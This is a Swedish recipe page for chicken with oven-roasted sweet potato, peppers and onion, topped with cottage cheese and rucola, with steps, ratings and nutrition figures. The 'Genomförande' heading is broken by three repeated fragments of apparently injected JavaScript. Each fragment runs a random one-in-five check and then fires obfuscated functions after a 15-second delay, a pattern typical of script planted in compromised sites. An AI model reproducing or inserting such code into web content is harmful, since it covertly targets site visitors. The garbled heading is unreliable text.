Kyckling med ugnsgrönsaker

2013-06-04
imageimageimage
  • Yield : 2
  • Servings : 2
  • Prep Time : 10m
  • Cook Time : 35m
  • Ready In : 45m

Ingredienser

• 2 st Kycklingfiléer
• 1 Sötpotatis
• 1 Gul Paprika
• 1 Röd Paprika
• 1 Gul Lök
• 2 msk Keso
• 2 vitlöksklyftor
• Ruccolla
• Franska Örter, Salt & Peppar

Genomförandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}e

Steg 1

Skiva alla grönsaker och ställ in i ugnen i 25 min på 210 g
Krydda kycklingfiléerna och pressa en vitlöksklyfta på vardera

Steg 2

Stek kycklingfiléerna på medeltemperatur tills de fått färg
Lägg sedan ner dem i formen tillsammans med grönsakerna sista 10 min

Steg 3

Toppa kycklingen med en matsked keso på vardera
och några ruccollablad

Medlemsbetyg

(3.6 / 5)

3.6 5 8
Betygsätt recept

8 people rated this recipe

Related Recipes:
  • Avokado & äggmacka

    Avokado & äggmacka

  • _SAM0358

    Havre, chokladpudding. Frukost kicken.

  • image

    Fisksoppa med smak av tomat och vitlök

  • image

    Hamburgare med äggbröd

  • Hummus

    Proteinrik hummus

Näringssinnehåll

Informationen gäller per portion

  • Kcal

    250
  • Protein

    25 g
  • Kolhydrater

    40 g
  • Fett

    3 g

Recipe Comments

Post A Comment

Current ye@r *